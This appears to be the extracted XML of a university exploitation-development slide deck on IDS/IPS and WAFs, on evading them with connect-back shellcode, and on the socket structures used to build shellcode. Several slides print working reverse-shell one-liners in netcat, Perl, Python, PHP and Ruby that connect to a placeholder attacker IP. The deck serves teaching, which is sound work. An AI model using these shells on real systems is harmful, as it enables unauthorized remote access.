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2" name="Shape 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7" name="Shape 4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6" name="Shape 5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2" name="Shape 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8" name="Shape 5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4" name="Shape 5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4" name="Shape 5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6" name="Shape 5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2" name="Shape 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8" name="Shape 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4" name="Shape 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4" name="Shape 5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1" name="Shape 6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owasp.org/index.php/Web_Application_Firewall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hrack.org/issues.html?id=7&amp;issue=62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4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4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ernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet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4.jp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Deep_packet_inspection" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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youtube.com/watch?v=tJsNu0VRKYY&amp;feature=related" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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 Hacking 104 + Exploitation Development 104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CIS 5930/4930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Spring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IDS / IPS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Network Intrusion Detection systems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/>
              <a:t>independent platform for identifying intrusions via examining network traffic from multiple hosts (Snort)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Host-based intrusion detection systems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120000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" lang="en"/>
              <a:t>application/agent on a host monitors system calls, application logs, file system modifications, and other thost activities and states to identify intrusions. (Tripwire, OSSEC, etc...)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others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IDS / IPS rules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/>
              <a:t>Statistical anomaly based detection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determines normal levels for bandwidth, common protocols, common ports, common connections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alerts generated when anomalies occur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/>
              <a:t>Specification-based anomaly detection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designer hardcodes the normal levels and common ports / connections /etc...  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>uncommon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)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alerts generated when unspecified behavior occurs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/>
              <a:t>Signature based detection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133333"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>Monitors network packets for pre-determined / pre-configured attack patterns (known as signatures)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IDS / IPS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include or trigger custom tools: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honeypots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traffic payload manglers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Firewall reconfigurator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security environment modifier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Threat Levels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Application Firewalls (WAF)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 appliance, server plugin, or filter that applies a set of rules to HTTP conversations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defend against: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SQLI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XSS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be very effective at mitigating most attacks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be required for an industry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PCI DSS v1.1 (Payment Card Industry, Data Security Standard)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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often mandated for cases where web applications are not regularly code audited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IDS  vs WAF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4508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IDS / IPS is at Transport &amp; Network layer (usually)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WAF is at application Layer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6139" x="4961167"/>
            <a:ext cy="4761760" cx="393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WAF Selection Criteria/Goals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Provides data sanity checking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Very few false positives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should NEVER disallow an authorized, valid request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…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from:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Web_Application_Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr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regulations mandate (in many industries) the companies either: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do regular code auditing of their software to get rid of bugs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establish a WAF, IDS / IPS instead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still will be vulnerabilities!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="18288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its like sweeping them under the rug!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if its behind a WAF, its likely not code audited....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vulnerabilities ++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Buffer restrictions on a web application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Often caused by a WAF filter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Usually filter for data types other than expected (data sanity checking)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ASCII only input for string buffers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numerical only input for integers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etc...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Mitigates many attacks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Bypassing IDS / IPS and WAF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Connect-Back Shellcode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Port-binding shellcode is easily foiled by firewalls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Have the victim connect back to the attacker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Usually outbound connections are not limited or filtered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Can defeat IDS / IPS and WAF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sometimes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TCP connect back to attacker's IP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attacker must have a listener waiting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IDS / IPS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WAF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Defeating IDS / IPS &amp; WAF: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connect back shellcode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refresher on port binding shellcode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encoded/polymorphic shellcode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Networking Shellcode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some history....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According to the Shellcoder's Handbook (page 370), port-binding shellcode wasn't introduced to the public until 2005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BlackHat 2005 presentation by Michael Lynn on Cisco IOS bind shell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Cisco and ISS censored the talk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details were never published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="18288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Mainly b/c Cisco IOS doesn't implement system calls, so this was very impressive, and dangerous.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Actually networking shellcode articles surfaced on phrack and other sites at least a year earlier (2004)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http://www.phrack.org/issues.html?id=7&amp;issue=62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 back shellcode components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a listener on the attacker machine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exploit code to run on  victim machine that opens a port, connects back, and provides shell access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 back shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (IDS)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58962" x="7336800"/>
            <a:ext cy="1591375" cx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84700" x="457200"/>
            <a:ext cy="1739900" cx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y="2721299" x="2191147"/>
            <a:ext cy="1142966" cx="5150612"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="205265" extrusionOk="0" h="30394">
                <a:moveTo>
                  <a:pt y="28497" x="205265"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="23754" x="195969"/>
                  <a:pt y="-276" x="183701"/>
                  <a:pt y="40" x="149491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="356" x="115280"/>
                  <a:pt y="25335" x="24915"/>
                  <a:pt y="30394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75" name="Shape 175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1972339" x="4304190"/>
            <a:ext cy="626100" cx="32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Attacker exploits buffer overflow in web server, or web application code.  [Uses connect-back shellcode]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2323825" x="357225"/>
            <a:ext cy="730499" cx="27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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IDS won't notice if it doesn't violate policies, and doesn't trigger a signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="177" name="Shape 177"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="1565175" x="3462200"/>
            <a:ext cy="5311799" cx="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36950" x="3107933"/>
            <a:ext cy="974227" cx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>
            <a:off y="4733250" x="2191150"/>
            <a:ext cy="0" cx="511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y="4382300" x="3509625"/>
            <a:ext cy="275100" cx="231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Firewall allows the outbound traffic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IDS will only notice if policy is violated, or signature is triggered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Connect back shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (I</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>S)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58962" x="7336800"/>
            <a:ext cy="1591375" cx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84700" x="457200"/>
            <a:ext cy="1739900" cx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y="2721307" x="2228998"/>
            <a:ext cy="889860" cx="5112637"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="205265" extrusionOk="0" h="30394">
                <a:moveTo>
                  <a:pt y="28497" x="205265"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="23754" x="195969"/>
                  <a:pt y="-276" x="183701"/>
                  <a:pt y="40" x="149491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="356" x="115280"/>
                  <a:pt y="25335" x="24915"/>
                  <a:pt y="30394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190" name="Shape 190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1972339" x="4304190"/>
            <a:ext cy="626100" cx="32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Attacker exploits buffer overflow in web server, or web application code.  [Uses connect-back shellcode]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y="1752600" x="357225"/>
            <a:ext cy="730499" cx="27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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IPS won't notice if it doesn't violate policies, and doesn't trigger a signature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 rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If it notices, may kill the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="1565175" x="3462200"/>
            <a:ext cy="5311799" cx="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36950" x="3107933"/>
            <a:ext cy="974227" cx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>
            <a:off y="4733250" x="2191150"/>
            <a:ext cy="0" cx="511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y="4077500" x="3509625"/>
            <a:ext cy="275100" cx="231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Firewall allows the outbound traffic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IPS will only notice if policy is violated, or signature is triggered.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If IPS notices, may kill the connect-back shellcode connection (foiling the attack)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 assembly level connect back shells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netcat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commonly used to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en"/>
              <a:t>to incoming connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-3810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2400" lang="en"/>
              <a:t>nc -v -l -p 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="182880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listen on port 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="36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-v = verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-419100" marL="45720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Using netcat to spawn a connect back shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:spcBef>
                <a:spcPts val="36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nc -e /bin/sh &lt;target ip&gt; &lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="36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so to set up a listener on attacker 192.168.1.166:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="36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nc -v -l -p 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="36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to connect back to attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="36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nc -e /bin/sh 192.168.1.116 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="36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Other connect back shellcode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(non asm)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214285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http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet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214285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http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html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218181"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"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perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'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240000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>replace 10.0.0.1 and p=1234 with attacker ip and port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Python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218181"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"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python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'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240000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>again.... replace 10.0.0.1 and p=1234 with attacker ip and port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Other connect back shellcode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(non asm)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PHP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218181"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"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php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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Ruby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218181"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'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we need to know how to write ASM connect back shellcode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For Science!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first a refresher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on port binding shellcode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to recap the networking details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Network Intrusion Detection/Prevention Systems:  (IDS / IPS)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4508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Primarily defend against transport &amp; network level attacks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monitors for malicious activity or policy violations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reports to a management station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usually @ per packet basis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6139" x="4961167"/>
            <a:ext cy="4761760" cx="393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port binding shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (IDS / IPS)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58962" x="7336800"/>
            <a:ext cy="1591375" cx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84700" x="457200"/>
            <a:ext cy="1739900" cx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y="2721336" x="3908033"/>
            <a:ext cy="370958" cx="3433570"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="205265" extrusionOk="0" h="30394">
                <a:moveTo>
                  <a:pt y="28497" x="205265"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="23754" x="195969"/>
                  <a:pt y="-276" x="183701"/>
                  <a:pt y="40" x="149491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="356" x="115280"/>
                  <a:pt y="25335" x="24915"/>
                  <a:pt y="30394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235" name="Shape 235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1972339" x="4304190"/>
            <a:ext cy="626100" cx="32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Attacker exploits buffer overflow in web server, or web application code.  [Uses port-binding shellcode]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1752600" x="357225"/>
            <a:ext cy="730499" cx="275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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IDS / IPS won't notice if it doesn't violate policies, and doesn't trigger a signature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 rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If IPS notices, may kill the traffic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y="3063800" x="2210025"/>
            <a:ext cy="1062299" cx="901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y="1565175" x="3462200"/>
            <a:ext cy="5311799" cx="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36950" x="3107933"/>
            <a:ext cy="974227" cx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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4733250" x="2191150"/>
            <a:ext cy="0" cx="511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241" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3772700" x="3509625"/>
            <a:ext cy="275100" cx="231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Firewall or IDS / IPS will kill the incoming connection most of the time by default.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This causes much difficulty for an attacker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y="4543550" x="3264275"/>
            <a:ext cy="531300" cx="4362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3" name="Shape 243"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="4458175" x="3245324"/>
            <a:ext cy="483900" cx="3699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Refresher (port binding c program)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1567950" x="5121200"/>
            <a:ext cy="1347000" cx="392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These familiar socket functions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all can be accessed with a single Linux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system call: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socketcall()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u="sng" b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall number 102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refresher (socketcall()   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SOCKETCALL(2)              Linux Programmer's Manual             SOCKETCALL(2)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NAME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 socketcall - socket system calls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SYNOPSIS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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t> int socketcall(int call, unsigned long *args);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DESCRIPTION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 socketcall()  is  a  common  kernel  entry  point for the socket system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 calls.  call determines which socket function to invoke.   args  points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 to a block containing the actual arguments, which are passed through to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 the appropriate call.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 User programs should call the  appropriate  functions  by  their  usual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     names.   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>Only  standard library implementors and kernel hackers need to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>       know about socketcall().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y="6108650" x="6194025"/>
            <a:ext cy="531300" cx="2504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>
                <a:latin typeface="Comic Sans MS"/>
                <a:ea typeface="Comic Sans MS"/>
                <a:cs typeface="Comic Sans MS"/>
                <a:sym typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>They said it themselves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Refresher (networking system calls)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These are the options for the 1st arg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for socketcall()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define SYS_SOCKET      1               /* sys_socket(2) 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SYS_BIND        2               /* sys_bind(2)   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SYS_CONNECT     3               /* sys_connect(2)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SYS_LISTEN      4               /* sys_listen(2) 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SYS_ACCEPT      5               /* sys_accept(2) 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SYS_GETSOCKNAME 6               /* sys_getsockname(2)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SYS_GETPEERNAME 7               /* sys_getpeername(2)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SYS_SOCKETPAIR  8               /* sys_socketpair(2)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SYS_SEND        9               /* sys_send(2)   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SYS_RECV        10              /* sys_recv(2)   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SYS_SENDTO      11              /* sys_sendto(2) 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SYS_RECVFROM    12              /* sys_recvfrom(2)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SYS_SHUTDOWN    13              /* sys_shutdown(2)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SYS_SETSOCKOPT  14              /* sys_setsockopt(2)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SYS_GETSOCKOPT  15              /* sys_getsockopt(2)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SYS_SENDMSG     16              /* sys_sendmsg(2)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SYS_RECVMSG     17              /* sys_recvmsg(2)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#define SYS_ACCEPT4     18              /* sys_accept4(2)               */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y="2618000" x="5577442"/>
            <a:ext cy="986399" cx="384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sz="1200"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int socketcall(int call, unsigned long *args);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="265" name="Shape 265"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2902550" x="6184525"/>
            <a:ext cy="796799" cx="920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6" name="Shape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1669450" x="4922975"/>
            <a:ext cy="5169575" cx="1090825"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="43633" extrusionOk="0" h="206783">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="12900" x="26559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="78160" x="26179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="81195" x="43633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="87646" x="30732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="183259" x="38700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="206783" x="11003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267" name="Shape 267"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2902550" x="7958200"/>
            <a:ext cy="1090799" cx="9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y="3917500" x="6526004"/>
            <a:ext cy="531300" cx="233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Vary depending on the corresponding int call #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Moving to shellcode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 EAX = 102 for socketcall()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EBX contains the type of socket call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ECX contains a pointer to the socket call's arguments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then int 0x80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Simple enough, but other parts get tricky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sockaddr structure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Refresher (port binding c program)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1647325" x="5274025"/>
            <a:ext cy="1347000" cx="417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The circled code is responsible for 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building the sockaddr structure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b="1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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    short            sin_family;   // e.g. AF_INET, AF_INET6</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    unsigned short   sin_port;     // e.g. htons(3490)</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    struct in_addr   sin_addr;     // see struct in_addr, below</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    char             sin_zero[8];  // zero this if you want to</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en"/>
            </a:b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u="sng" b="1">
              <a:solidFill>
                <a:schemeClr val="accent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y="3614296" x="169150"/>
            <a:ext cy="1963547" cx="5852550"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="234102" extrusionOk="0" h="72469">
                <a:moveTo>
                  <a:pt y="0" x="53498"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="5691" x="18212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="28077" x="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="62604" x="3415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="71710" x="16695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="72469" x="162771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="68295" x="226134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="46289" x="234102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="29215" x="227652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="2656" x="202231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="1517" x="118758"/>
                </a:lnTo>
                <a:close/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b="1"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mov DWORD PTR [esp+8], 0x0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mov DWORD PTR [esp+4], 0x1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mov DWORD PTR [esp], 0x2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call   0x8048394 &lt;socket@plt&gt;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4277950" x="6127625"/>
            <a:ext cy="682799" cx="25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Arguments are pushed on the stack in reverse order,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so PF_INET = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>and SOCK_STREAM =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b="1"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mov WORD PTR [ebp-40], 0x2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y="4277950" x="6127625"/>
            <a:ext cy="682799" cx="25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so,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AF_INET =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u="sng" b="1"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mov DWORD PTR [esp], 0x7a69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call   0x8048374 &lt;htons@plt&gt;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4277950" x="6127625"/>
            <a:ext cy="682799" cx="25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0x7a69 is hex for 31337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but htons reverses the byte order.  So it becomes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0x697a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Disassembly view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u="sng" b="1"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INADDR_ANY will be 0.0.0.0 in memory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0x00   0x00    0x00    0x00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y="4277950" x="6127625"/>
            <a:ext cy="682799" cx="25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This is a lot of nullbytes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IDS / IPS packet inspection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4508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Stateful Packet Inspection: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60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>scan TCP / UDP headers for incoming and outgoing packets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60000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>protocol noncompliance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60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>forms a state model for each connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for each SYN packet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60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>prevents certain kinds of denial of service attacks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6139" x="4961167"/>
            <a:ext cy="4761760" cx="393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u="sng" b="1" sz="1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1100" x="1044025"/>
            <a:ext cy="971550" cx="76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y="2608175" x="4026498"/>
            <a:ext cy="2532600" cx="478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1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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char             sin_zero[8];  // zero this if you want to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0x0002 for AF_INET  (short)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1100" x="1044025"/>
            <a:ext cy="971550" cx="768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>
            <a:off y="2371375" x="3718300"/>
            <a:ext cy="986399" cx="20013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	(little endian)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0x697a for network reverse order 31337  (short)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1100" x="1044025"/>
            <a:ext cy="971550" cx="768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Shape 340"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2428275" x="5217000"/>
            <a:ext cy="1252200" cx="60719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	(little endian)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0.0.0.0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any ip address.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1100" x="1044025"/>
            <a:ext cy="971550" cx="768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Shape 349"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2418800" x="5814749"/>
            <a:ext cy="1261799" cx="378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50" name="Shape 350"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2409300" x="5919625"/>
            <a:ext cy="1271399" cx="222839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the struct looks like before bind()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1100" x="1044025"/>
            <a:ext cy="971550" cx="76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y="2949975" x="5097723"/>
            <a:ext cy="2532600" cx="4230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1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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char             sin_zero[8];  // zero this if you want to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};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y="2418800" x="5852550"/>
            <a:ext cy="1574700" cx="550200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60" name="Shape 360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2418800" x="5097723"/>
            <a:ext cy="1422899" cx="9254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61" name="Shape 361"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2372025" x="3703998"/>
            <a:ext cy="1279800" cx="15794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62" name="Shape 362"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="2390350" x="6886424"/>
